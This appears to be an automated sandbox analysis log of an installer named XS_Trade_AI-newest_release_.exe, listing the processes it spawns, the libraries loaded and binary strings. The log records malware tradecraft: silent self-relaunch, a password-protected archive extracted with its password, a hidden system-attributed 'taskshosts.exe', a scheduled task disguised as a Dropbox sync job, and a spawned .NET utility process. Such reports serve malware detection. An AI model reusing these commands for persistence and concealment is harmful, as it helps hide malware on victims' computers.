      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$402A0,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-Jump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" -o"C:\Users\user\AppData\Local\Programs\Common" -y -p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /fJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd""Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"Jump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: winsta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: sxs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: winsta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: winhttpcom.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: mlang.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: explorerframe.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: python3.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libffi-7.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libcrypto-1_1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: python3.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libffi-7.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: libcrypto-1_1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpWindow found: window name: TMainFormJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: XS_Trade_AI-newest_release_.exeStatic file information: File size 2528268 > 1048576
      Source: XS_Trade_AI-newest_release_.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016209279.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018746592.000000000124F000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.19.dr
      Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2017090409.000000000124E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015682768.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016030196.000000000124E000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.19.dr, _lzma.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015374967.000000000124D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000124F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.15.dr
      Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2015258110.000000000124D000.00000004.00000020.00020000.00000000.sdmp
